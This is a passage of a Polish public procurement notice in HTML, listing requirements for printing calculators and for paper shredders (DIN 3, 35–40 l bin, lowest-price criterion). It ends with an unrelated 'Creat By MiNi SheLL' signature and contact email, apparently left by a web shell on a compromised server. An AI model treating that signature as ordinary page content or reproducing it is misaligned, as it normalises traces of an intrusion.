- funkcja sumy końcowej, - zaokrąglanie w górę i w dół, - wynik może być zapisywany z: 6, 4, 3, 2, 1, 0 miejsc po przecinku i w zapisie walutowym, - niezależna pamięć, - możliwość cofania ostatniej pozycji, - obliczenie zysków i strat, - klawisz potrójnego zera, - prędkość wydruku 3,5 linii / sekundę, - czarna plastikowa obudowa oraz plastikowe klawisze, - zielone cyfry, - standardowa taśma -  58 mm, - zasilanie sieciowe, zasilacz wbudowany..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.14.10.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa niszczarek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa niszczarek
- system Energy Smart, - cichy napęd łańcuchowy, - trwałe noże odporne na zszywki i spinacze, - automatyczny start / stop  zapewniający łatwą i bezpieczną obsługę, - silnik przystosowany do pracy ciągłej 24 godziny, - automatyczne odcięcie zasilania w przypadku zaklinowania papieru lub wyjęcia pojemnika na ścinki,
- dioda informująca o wyjętym koszu, - przezroczyste okno w obudowie, - system cięcia, - poziom tajności - DIN 3, - ilość jednorazowo ciętych kartek: 12 - 14,
- szerokość wejścia - minimum 230 mm, - szybkość niszczenia - minimum 2,1 m / min. - głośność - nie więcej niż 55 db, - moc  - nie więcej niż 250 W, - napięcie - 230 V, - wyjmowany pojemnik na ścinki, - funkcja cofania, - pojemność kosza - 35 -  40 l..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.10.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com